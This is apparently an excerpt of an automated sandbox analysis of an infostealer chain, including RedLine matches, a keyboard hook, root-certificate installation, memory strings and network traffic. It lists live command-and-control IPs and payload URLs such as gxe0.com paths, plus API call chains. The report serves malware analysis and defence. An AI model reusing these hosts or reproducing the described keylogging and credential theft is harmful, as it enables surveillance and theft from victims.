                      Source: alg.exe, 0000001D.00000003.1500485839.000000000057A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/obvywkjre#-8
                      Source: alg.exe, 0000001D.00000003.2066404539.000000000057C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/ywvbvutri
                      Source: Native_neworigin.exe, 0000001B.00000002.1778079726.000000000522C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/
                      Source: Native_neworigin.exe, 0000001B.00000002.1778079726.000000000522C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/.
                      Source: Native_neworigin.exe, 0000001B.00000002.1778079726.000000000522C000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1671554785.000000000063E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/aldxsqumvddjjq
                      Source: Native_neworigin.exe, 0000001B.00000002.1778079726.000000000522C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/aldxsqumvddjjq
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                      Source: kn.exeString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: kn.exe, 0000000C.00000002.1297481760.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000C.00000000.1286664343.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000E.00000000.1299867443.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000E.00000002.1305778842.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDisallowedCertLastSyncTimePinR
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                      Source: Native_neworigin.exe, 0000001B.00000002.1722177417.000000000305A000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1722177417.0000000003218000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1778079726.000000000522C000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1671554785.000000000068E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/0
                      Source: Native_neworigin.exe, 0000001B.00000002.1722177417.000000000305A000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1722177417.0000000003218000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1778079726.000000000522C000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1671554785.000000000068E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
                      Source: Native_neworigin.exe, 0000001B.00000002.1722177417.0000000003218000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s82.gocheapweb.com
                      Source: Native_neworigin.exe, 0000001B.00000002.1722177417.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: AnyDesk.PIF, AnyDesk.PIF, 0000000F.00000002.1459416504.0000000002E1E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1496446844.0000000020BA2000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1311999021.000000007F920000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1543463102.0000000021AA0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1575416317.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1432008197.00000000007F6000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1457046440.0000000002C53000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1496446844.0000000020AD0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1311674784.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1544663753.0000000021CA2000.00000004.00001000.00020000.00000000.sdmp, aymtmquJ.pif, 00000019.00000000.1432545418.0000000000416000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.pmail.com
                      Source: Native_neworigin.exe, 0000001B.00000002.1722177417.0000000003218000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1778079726.000000000522C000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1778079726.0000000005282000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1671554785.000000000063E000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1671554785.000000000068E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                      Source: Native_neworigin.exe, 0000001B.00000002.1722177417.0000000003218000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1778079726.000000000522C000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1778079726.0000000005282000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1671554785.000000000063E000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1671554785.000000000068E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                      Source: alg.exe, 0000001D.00000003.2794724738.0000000000430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/external-general-entitieshttp://xml.org/sax/features/namespacesXml
                      Source: alg.exe, 0000001D.00000003.2794724738.0000000000430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/lexical-handler/parameter-entitieshttp://xml.org/sax/features/external-p
                      Source: alg.exe, 0000001D.00000003.2794724738.0000000000430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/properties/lexical-handler(Mso::Xml::MxWriter)
                      Source: alg.exe, 0000001D.00000003.2794724738.0000000000430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/properties/lexical-handlerxmlns
                      Source: kn.exeString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%ws
                      Source: kn.exe, 0000000C.00000002.1297481760.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000C.00000000.1286664343.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000E.00000000.1299867443.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000E.00000002.1305778842.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
                      Source: Native_neworigin.exe, 0000001B.00000002.1722177417.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: Native_neworigin.exe, 0000001B.00000002.1722177417.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: Native_neworigin.exe, 0000001B.00000002.1722177417.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: Native_neworigin.exe, 0000001B.00000002.1722177417.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: alg.exe, 0000001D.00000003.2194386050.0000000001490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
                      Source: alg.exe, 0000001D.00000003.2778966373.0000000000420000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ecs.office.com/config/v2/OfficeFA000000
                      Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc
                      Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/device/
                      Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/key/
                      Source: AnyDesk.PIF, 0000000F.00000002.1438483669.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/
                      Source: AnyDesk.PIF, 0000000F.00000002.1496446844.0000000020BDD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak2/233_Juqmtm
                      Source: AnyDesk.PIF, 0000000F.00000002.1438483669.0000000000776000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak2/233_Juqmtmyadyy
                      Source: AnyDesk.PIF, 0000000F.00000002.1438483669.00000000007A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak2/233_JuqmtmyadyyG
                      Source: AnyDesk.PIF, 0000000F.00000002.1438483669.000000000072E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak2/233_JuqmtmyadyyP
                      Source: AnyDesk.PIF, 0000000F.00000002.1438483669.00000000007A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com:443/yak2/233_Juqmtmyadyy
                      Source: kn.exeString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorize
                      Source: kn.exe, 0000000C.00000002.1297481760.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000C.00000000.1286664343.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000E.00000000.1299867443.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000E.00000002.1305778842.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
                      Source: kn.exeString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/token
                      Source: alg.exe, 0000001D.00000003.2794724738.0000000000430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://otelrules.azureedge.netsdxhelper.exeofficec2rclient.exe
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                      Source: unknownHTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.10:49731 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49824 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49940 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49953 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to log keystrokes (.Net Source)
                      Source: 27.2.Native_neworigin.exe.5360000.7.raw.unpack, cPKWk.cs.Net Code: I3Mi2zn6x
                      Installs a global keyboard hook
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWindow created: window name: CLIPBRDWNDCLASS
                      Source: alg.exe, 0000001D.00000003.2667144264.0000000001490000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: RegisterRawInputDevicesmemstr_76e93ac4-5

                      E-Banking Fraud

                      barindex
                      Registers a new ROOT certificate
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A9B684 CertCompareCertificateName,#357,#357,CertEnumCertificatesInStore,CertCompareCertificateName,CertComparePublicKeyInfo,memcmp,#357,CertEnumCertificatesInStore,#357,CertFreeCertificateContext,CertAddCertificateContextToStore,GetLastError,12_2_00007FF627A9B684
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B1A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,12_2_00007FF627B1A740
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA25E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,12_2_00007FF627AA25E8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ADE1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,12_2_00007FF627ADE1F8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AD0F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,12_2_00007FF627AD0F58
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE0EF4 NCryptImportKey,#205,#359,#359,#357,12_2_00007FF627AE0EF4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B16EA8 NCryptImportKey,#360,12_2_00007FF627B16EA8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACEA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,12_2_00007FF627ACEA7C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA29A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,12_2_00007FF627AA29A0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AD184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,12_2_00007FF627AD184C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B198B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,12_2_00007FF627B198B0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,12_2_00007FF627AE342C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B193A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,12_2_00007FF627B193A0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A7FC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,12_2_00007FF627A7FC20
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A6F9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,12_2_00007FF627A6F9B8

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 27.2.Native_neworigin.exe.2fe0000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 27.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 43.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 27.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 43.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      .NET source code contains very large strings
                      Source: Trading_AIBot.exe.25.dr, cfRDgxIJtEfCD.csLong String: Length: 17605
                      Drops large PE files
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile dump: apihost.exe.28.dr 665670656Jump to dropped file
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EC7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,9_2_00007FF706EC7FF8
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EC8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,9_2_00007FF706EC8114
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EDBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,9_2_00007FF706EDBCF0
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EC88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,9_2_00007FF706EC88C0
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EC89E4 NtQueryInformationToken,NtQueryInformationToken,9_2_00007FF706EC89E4
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EB3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,9_2_00007FF706EB3D94
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EC898C NtQueryInformationToken,9_2_00007FF706EC898C
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EE1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,9_2_00007FF706EE1538
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EC7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,11_2_00007FF706EC7FF8
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EC8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,11_2_00007FF706EC8114
